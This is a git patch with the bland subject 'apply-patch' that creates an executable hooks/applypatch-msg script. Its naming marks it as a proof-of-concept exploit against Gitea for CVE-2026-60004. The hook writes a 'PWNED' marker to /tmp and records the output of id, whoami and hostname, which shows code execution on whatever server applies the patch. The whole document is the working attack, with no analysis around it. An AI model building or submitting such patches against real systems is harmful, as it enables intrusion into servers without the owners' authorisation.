From cf69c3c341a5f91dabb0c222decf0ffce121a6f2 Mon Sep 17 00:00:00 2001 From: dev81266 Date: Wed, 29 Jul 2026 07:59:05 +0800 Subject: [PATCH] apply-patch --- hooks/applypatch-msg | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100755 hooks/applypatch-msg diff --git a/hooks/applypatch-msg b/hooks/applypatch-msg new file mode 100755 index 0000000..6c43288 --- /dev/null +++ b/hooks/applypatch-msg @@ -0,0 +1,6 @@ +#!/bin/sh + +echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt +id >> /tmp/gitea_pwn.txt +whoami >> /tmp/gitea_pwn.txt +hostname >> /tmp/gitea_pwn.txt